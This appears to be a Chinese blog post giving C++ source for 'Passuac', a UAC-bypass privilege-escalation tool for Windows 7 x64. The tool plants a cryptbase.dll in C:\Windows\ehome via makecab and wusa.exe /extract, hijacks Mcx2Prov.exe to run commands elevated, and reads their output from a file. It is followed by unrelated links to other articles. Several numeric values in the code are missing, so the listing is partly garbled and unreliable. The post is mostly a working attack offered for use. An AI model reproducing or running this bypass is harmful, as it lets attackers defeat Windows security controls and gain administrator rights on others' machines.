// Passuac.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

#include <Windows.h>

#include <stdio.h>

#include  <direct.h>

BOOL IsUserInAdminGroup() //判断是否在管理员组

{

    BOOL fInAdminGroup = FALSE;

    HANDLE hToken = NULL;

    HANDLE hTokenToCheck = NULL;

    DWORD cbSize = ;

    OSVERSIONINFO osver = {};

    osver.dwOSVersionInfoSize = sizeof(osver);

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))

        goto Cleanup;

    if (!GetVersionEx(&osver))

        goto Cleanup;

    if (osver.dwMajorVersion >= )

    {

        TOKEN_ELEVATION_TYPE elevType;

        if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))

            goto Cleanup;

        if (TokenElevationTypeLimited == elevType)

        {

            if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))

                goto Cleanup;

        }

    }

    if (!hTokenToCheck)

    {

        if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))

            goto Cleanup;

    }

    BYTE adminSID[SECURITY_MAX_SID_SIZE];

    cbSize = sizeof(adminSID);

    if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))

        goto Cleanup;

    if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup))

        goto Cleanup;

Cleanup:

    if (hToken)    CloseHandle(hToken);

    if (hTokenToCheck) CloseHandle(hTokenToCheck);

    return fInAdminGroup;

}

BOOL IsRunAsAdmin() //判断是否以管理员权限运行

{

    BOOL fIsRunAsAdmin = FALSE;

    DWORD dwError = ERROR_SUCCESS;

    PSID pAdministratorsGroup = NULL;

    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;

    if (!AllocateAndInitializeSid(

        &NtAuthority,

        ,

        SECURITY_BUILTIN_DOMAIN_RID,

        DOMAIN_ALIAS_RID_ADMINS,

        , , , , , ,

        &pAdministratorsGroup))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

    if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

Cleanup:

    if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);

    return fIsRunAsAdmin;

}

BOOL writedll64()

{

    char Szpath[MAX_PATH] = {};

    char uacexqute[] = {};

    DWORD   dwWrite=;

    WORD wResID;

    HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

    if (hFile == INVALID_HANDLE_VALUE)

    {

        printf("Getlasterror:%d.\r\n",GetLastError());

        return ;

    }

    HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");

    HGLOBAL hG = LoadResource(NULL, hrsc);

    DWORD   dwSize = SizeofResource( NULL,  hrsc); 

    WriteFile(hFile,hG,dwSize,&dwWrite,NULL);

    CloseHandle( hFile );

    getcwd(Szpath, MAX_PATH);

    strcat(Szpath,"\\cryptbase.tmp");

    system("makecab cryptbase.dll cryptbase.tmp");

    sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

    ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

    //remove("cryptbase*");

    DeleteFileA("cryptbase.dll");

    DeleteFileA("cryptbase.tmp");

    return true;

}

int main(int argc,char* argv[])

{

    FILE* fp;

    char szcmd[] = {};

    char *Options;

    char buffer[] = {};

    STARTUPINFO si={sizeof(si)};

    PROCESS_INFORMATION pi;

    si.dwFlags=STARTF_USESHOWWINDOW;

    si.wShowWindow=TRUE;

    if (argc < )

    {

        printf("[*]:%s Passuac for windows 7 x64\n",argv[]);

        printf("[*]:%s Setp1: passuac\r\n",argv[]);

        printf("[*]:%s Setp2: shell_cmd\r\n",argv[]);

        printf("[*]:Welcome to www.90sec.org\r\n");

        printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");

        return ;

    }

    strcpy(szcmd,argv[]);

    char szNewCmd[MAX_PATH] = {};

    wsprintfA(szNewCmd, "\"%s\"", szcmd);

    if (!IsUserInAdminGroup())

    {

        printf("Your not have in Local Administrator Group\r\n");

        printf("Program exit;");

        exit();

    }else

    {

        printf("Your have in Local Administrator Group\r\n");

        printf("PassUac ing.....\r\n");

        if (!IsRunAsAdmin())

        {

            if (!strcmp(szcmd,"passuac"))

            {

                writedll64();

            }else

            {

                ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);

                Sleep();

                fp = fopen("c:\\programdata\\uac.txt","rb");

                if (fp == NULL)

                {

                    printf("Getlasterror:%d\r\n",GetLastError());

                    return ;

                }

                ZeroMemory(buffer,sizeof(buffer));

                while (fgets(buffer,sizeof(buffer),fp))

                {

                    printf(buffer);

                }

                fclose(fp);

            }

        }

    }

    return ;

}

需要自己写个DLL,来进行参数解析。请看代码把。

代码写的相当烂,但是能够达到地步,还请各位莫笑话。

WIN7 X64 PASSUAC 源码的更多相关文章

  1. tesseract4.0:win10 +x64+vs2015 源码安装(ViewerDebugging)安装记录

    参考文章: https://blog.csdn.net/u013985291/article/details/78295789 https://blog.csdn.net/u013985291/art ...

  2. 16Aspx.com源码2014年7月详细

            Web电子商务网(三层)V2.0源码 2014-07-31   [VS2010] 源码介绍: Web电子商务网(三层)V2.0源码 源码描述: 一.源码特点     采用三层架构开发, ...

  3. win7 x64 +vs2015 + cmake3.10.3编译opencv-3.4.1+opencv_contrib-3.4.1源码,并进行配置

    简介: 一直以来都是在ubuntu下使用opencv,最近因为有<图像处理与模式识别>这门课,需要使用vs2015+opencv提交课程作业,因为opencv官方编译好的exe没有cont ...

  4. qt4.8.7 源码在win7+vs2010环境的x64编译(qt 64位)

    由于qt官网上,没有直接提供x64的安装包,但由于项目需要x64的qt,所以,小编不得不下载qt的源码,经历了一次长达约4个小时的编译过程.今年国庆7天,就遭这事上了,哈哈~~~ 几个下载链接: qt ...

  5. 谷歌开源项目Chromium的源码获取与项目构建(Win7+vs10/vs13)

    转自:http://blog.csdn.net/kuerjinjin/article/details/23563059 从12年那会儿开始获取源码和构建chromium项目都是按照那时候的官方要求用w ...

  6. mpusher 源码编译 for windows X64

    mpusher 源码编译 for windows X64 对于java我是小白,通过一步步的摸索,将经验总结下来,给更多码友提供入门的帮助.一个人的摸索是很困难的,本教程感谢 [MPush开源消息推送 ...

  7. Windows 10 x64 下编译 Hadoop 源码

    Windows 10 x64 下编译 Hadoop 源码 环境准备 Hadoop并没有提供官方的 Windows 10 下的安装包,所以需要自己手动来编译,官方文档中 BUILDING.txt 文件中 ...

  8. QGIS(2.18.15 源码)+Qt(5/5.9.3)+VS2015(X64)编译

    由于工作要求,今年需要基于Qt搞跨平台的GIS.前期未曾接触过Qt,最近也简单学习了下,开源的QGIS是非常不错的学习资源,下了最新版的QGIS源码,不过在VS2015下却没法直接打开.网上查了很多资 ...

  9. 32位win7+vs2008编译mysql 5.6.22源码并安装

    以下这部分安装说明是来自http://www.2cto.com/database/201407/316681.html的win7+vs2010源码编译mysql,文章最后会说明用vs2008编译遇见的 ...

随机推荐

  1. ADO.NET详细学习笔记《一》

    目录 ADO.NET和ADO的区别 ADO.NET的五大核心对象 Connection对象 Command对象 DataAdapter对象,DataSet对象 DataReader对象 [1]ADO. ...

  2. git push 推送大文件失败的处理办法

    不小心把数据库备份文件放到git目录里了,导致无法上传代码. 首先参考了 这篇文章 http://www.cnblogs.com/qmmq/p/4604862.html. 按照文中一开始说的去做,可还 ...

  3. IOS开发复习笔记(3)-ARC

    1.ARC 当你自己调用了release或retain语句的时候,ARC有效时编译文件会遇到错误,你可以通过-fno-objc-arc和-fobjc-arc两个编译器标志在混搭中支持ARC和非ARC的 ...

  4. Nuxt使用iconfont矢量图标

    Nuxt可以使用各种前端UI框架,这些框架一般都自带的有一些icon图标可供用户使用,但是一般项目开发的时候,UI框架自带的icon是不能满足实际项目需求的,这个时候我们可以自己找一些图片放到本地项目 ...

  5. Django~表的操作

    增(create  ,  save) from app01.models import *   #create方式一:   Author.objects.create(name='Alvin')    ...

  6. W5100硬件设计和调试要点

    文章来源:成都浩然 与MCU的接口 W5100与MCU接口採用并行总线方式(假设要使用SPI接口,建议採用W5200),因此W5100与MCU的接口设计相对简单.以AT89C52为例,例如以下图所看到 ...

  7. 爬取豆瓣电影信息保存到Excel

    from bs4 import BeautifulSoup import requests import html.parser from openpyxl import Workbook,load_ ...

  8. android开发 软键盘出现后 防止EditText控件遮挡 总体平移UI

    在EditText控件接近底部的情况下 软键盘弹出后会把获得焦点的EditText控件遮挡 无法看到输入信息  防止这种情况发生 就须要设置AndroidManifest.xml的属性 前面的xml信 ...

  9. C# W3 调试

    如果在调试附加进程中 没W3进程的话, 在运行里输入 uac  设置为从不通知 即可:

  10. 4.6 基于STM32+MC20地图显示路径功能

    需要准备的硬件 MC20开发板 1个 https://item.taobao.com/item.htm?id=562661881042 GSM/GPRS天线 1根 https://item.taoba ...